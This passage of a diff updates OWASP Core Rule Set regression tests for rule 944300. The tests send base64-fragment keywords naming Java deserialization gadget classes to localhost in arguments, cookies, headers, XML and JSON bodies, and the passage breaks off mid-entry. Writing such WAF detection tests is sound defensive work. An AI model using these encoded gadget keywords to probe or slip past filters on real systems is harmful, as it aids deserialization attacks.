dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 154 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 155 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 156 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 157 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
test=BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 158 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 159 desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 160 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 161 desc: "XML element value includes keyword 
BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 162 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 163 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 164 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 165 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 166 desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-167 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 167 desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log: + expect_ids: [944300] + - test_id: 168 desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 169 desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 170 desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 171 desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + 
log: + expect_ids: [944300] + - test_id: 172 desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 173 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 174 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 175 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 176 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 177 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" 
- version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 178 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 179 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: 